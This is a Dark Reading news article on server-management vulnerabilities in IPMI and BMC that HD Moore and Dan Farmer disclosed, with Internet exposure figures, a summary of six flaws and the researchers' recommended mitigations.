Dark Reading is part of the Informa Tech Division of Informa PLC

This site is operated by a business or businesses owned by Informa PLC and all copyright resides with them.Informa PLC's registered office is 5 Howick Place, London SW1P 1WG. Registered in England and Wales. Number 8860726.


05:51 PM
Connect Directly

New Gaping Security Holes Found Exposing Servers

Researcher HD Moore so far has discovered around 300,000 servers online at serious risk of hacker takeover

A widely deployed protocol and controller used in servers and workstations both contain serious vulnerabilities that, in effect, give attackers near-physical access to the machines, a pair of renowned researchers said today.

HD Moore, chief research officer at Rapid7 and creator of Metasploit, and security researcher Dan Farmer announced findings of their research on major flaws in the Intelligent Platform Management Interface (IPMI) protocol and the Baseboard Management Controllers (BMC) packaged with most servers for remote management purposes.

As part of his ongoing Internet scanning research, Moore found more than 100,000 servers and workstations online that are vulnerable to one or more of six flaws in IPMI and BMC -- some of which were bugs Farmer revealed earlier this year -- which Moore says is just the tip of the iceberg of potential servers in danger on the Net. The bugs could allow an attacker to compromise BMCs in the affected servers and siphon data from attached storage devices, make changes to the operating system, install a permanent backdoor, sniff credentials sent through the server, launch a denial-of-service attack, or wipe the hard drives.

[Unplug Universal Plug And Play (UPnP) to protect routers, storage devices, media players from getting hacked over the Internet, Rapid7 says. See Millions Of Networked Devices In Harm's Way.]

Moore says these findings are big and more serious than other equipment he has found exposed on the Internet. "It's one thing to be hacking some crappy home router, but it's another thing" to see servers wide open to attack, he says.

And there isn't really a fix for the IPMI protocol problems. "By definition, the technology is pretty much broken. There's no such thing as an IPMI secure device," Moore says.

The vulnerabilities follow a common theme in other weaknesses Moore has discovered in Internet-facing equipment: default backdoor-type access by the vendors for internal ease of access and use, including default passwords, and customers either unaware or not understanding the looming dangers of the holes sitting exposed on the Internet.

"This definitely qualifies for the moniker 'gaping security hole,'" says Chris Wysopal, CTO at Veracode. "These management interfaces give, as Dan [Farmer] says, 'equivalent to physical access' and use a separate authentication scheme than IT admins typically use with centralized authentication, such as Windows Active Directory. Many admins don't know this management interface exists."

Those server ports should not be open to the outside, either, Wysopal says, so it appears to be a very prevalent mistake by server admins. "The big deal I see is that once an attacker is through the perimeter, they can have a field day internally with these vulnerabilities."

BMCs are found on most servers today, and are OEMed and sold by Dell, HP, IBM, and Supermicro, for instance; they are either integrated on the motherboard of the server or as an add-on that plugs into a connector or PCI slot. They are basically computers in their own right that offer remote management of servers, and provide things like virtual keyboards, video, mouse, power, and removable media control for the machines. And even when the server is powered down, the BMC is still powered on.

IPMI, the server management protocol that runs on the BMC, is supported by some 200 vendors and was found by Farmer to have various authentication and access flaws.

The researchers say attackers could hack into a server via a compromised BMC by rebooting the server from a virtual CD-ROM and using a rescue disk. "The former resets the local Windows Administrator account password and the latter does an in-memory patch that disables console authentication in both Linux and Windows. The BMC can then force the server to boot normally and provide console access to the attacker through built-in KVM functionality," they wrote in an FAQ on the vulnerabilities.

"The BMC provides the equivalent of physical access to the server with many of the security exposures that this implies, such as booting to single-user mode, accessing the BIOS settings, and being able to watch the physical display. If the hard drives of the server are not encrypted, an attacker could boot the server into a rescue environment, and manipulate or copy the file system without any assistance from the server's operating system," they wrote.

Farmer's initial work on the bugs initially didn't capture much public attention. "It kind of sat there for five months, and the security community ignored it," he says. "It wasn't until we got some Internet exposure to how bad it really was" that it got the attention it deserved, according to Moore.

There are a total six flaws with BMC security that the researchers found, most of which are rooted in the IPMI protocol:

• IPMI version 2.0's "cipher 0" encryption method that bypasses authentication altogether for IPMI commands. This feature is often on by default in BMCs;

• IPMI version 2.0 sends requesting clients a cryptographic hash of the user's password before authentication, which could allow an attacker to brute-force the hash to grab the password if it's not a strong one;

• IPMI version 2.0 supports logins by anonymous users -- with a username and password set to "null." This user account often comes with administrative privileges, and some BMC vendors ship this feature activated by default;

• All versions of IPMI are able to provide authentication methods remotely to a requester via the "get channel authentication" request;

• Some BMCs enable the Universal Plug and Play (UPnP) protocol by default and have no option for disabling it. Supermicro's BMC is among those vendors;

• IPMI passwords are stored unencrypted in BMCs. This is especially dangerous because multiple servers often share the same IPMI password. Both Dell and Supermicro BMCs are configured with unencrypted IPMI passwords.

Rapid7 found 308,000 IPMI-enabled BMCs exposed on the Net, 195,000 of which have no encryption because they run IPMI 1.5, which doesn't support it. Some 99,000 of the IPMI 2.0 servers expose password hashes, 53,000 are at risk of password bypass with Cipher 0, and 35,000 use a vulnerable UPnP service.

Meanwhile, most server hosting providers that support Supermicro BMCs are affected by these flaws. The danger here is that an attacker could install a permanent backdoor on the BMC that would provide it access to all of the hosting providers customers on that hardware platform, Moore says.

Rapid7, itself, had a brush with the BMC security holes earlier this year. The vulnerability management and penetration testing firm got a shipment of third-party appliances that included Supermicro motherboards that came with IPMI enabled. "The first round of Supermicro boards we received this year had IPMI enabled by default, and it took a couple long days and late nights to jumper them so we could use them as intended without introducing a risk," Moore recalls. "Our new boards specifically exclude the IPMI feature."

What To Do About It
Among the recommendations by the researchers: scan for and detect any exposed systems to make sure IPMI-enabled BMCs are not exposed to the Internet. For servers running internally, disable Cipher 0; set up strong and complex passwords; and for Supermicro BMCs, update the firmware.

Moore's full posting on the IPMI/BMC server security issues, including links to Farmer's research, is available here.

Have a comment on this story? Please click "Add Your Comment" below. If you'd like to contact Dark Reading's editors directly, send us a message. Kelly Jackson Higgins is Executive Editor at DarkReading.com. She is an award-winning veteran technology and business journalist with more than two decades of experience in reporting and editing for various publications, including Network Computing, Secure Enterprise ... View Full Bio

Comment  | 
Print  | 
More Insights
Newest First  |  Oldest First  |  Threaded View
AI Is Everywhere, but Don't Ignore the Basics
Howie Xu, Vice President of AI and Machine Learning at Zscaler,  9/10/2019
Fed Kaspersky Ban Made Permanent by New Rules
Dark Reading Staff 9/11/2019
Register for Dark Reading Newsletters
White Papers
Cartoon Contest
Current Issue
7 Threats & Disruptive Forces Changing the Face of Cybersecurity
This Dark Reading Tech Digest gives an in-depth look at the biggest emerging threats and disruptive forces that are changing the face of cybersecurity today.
Flash Poll
The State of IT Operations and Cybersecurity Operations
The State of IT Operations and Cybersecurity Operations
Your enterprise's cyber risk may depend upon the relationship between the IT team and the security team. Heres some insight on what's working and what isn't in the data center.
Twitter Feed
Dark Reading - Bug Report
Bug Report
Enterprise Vulnerabilities
From DHS/US-CERT's National Vulnerability Database
PUBLISHED: 2019-09-15
A Polymorphic Typing issue was discovered in FasterXML jackson-databind before 2.9.10. It is related to com.zaxxer.hikari.HikariConfig.
PUBLISHED: 2019-09-15
In the api-bearer-auth plugin before 20190907 for WordPress, the server parameter is not correctly filtered in the swagger-config.yaml.php file, and it is possible to inject JavaScript code, aka XSS.
PUBLISHED: 2019-09-15
GetSimple CMS v3.3.15 has Persistent Cross-Site Scripting (XSS) in admin/theme-edit.php.
PUBLISHED: 2019-09-15
In Bludit v3.9.2, there is a persistent XSS vulnerability in the Categories -> Add New Category -> Name field. NOTE: this may overlap CVE-2017-16636.
PUBLISHED: 2019-09-15
A Polymorphic Typing issue was discovered in FasterXML jackson-databind before 2.9.10. It is related to com.zaxxer.hikari.HikariDataSource. This is a different vulnerability than CVE-2019-14540.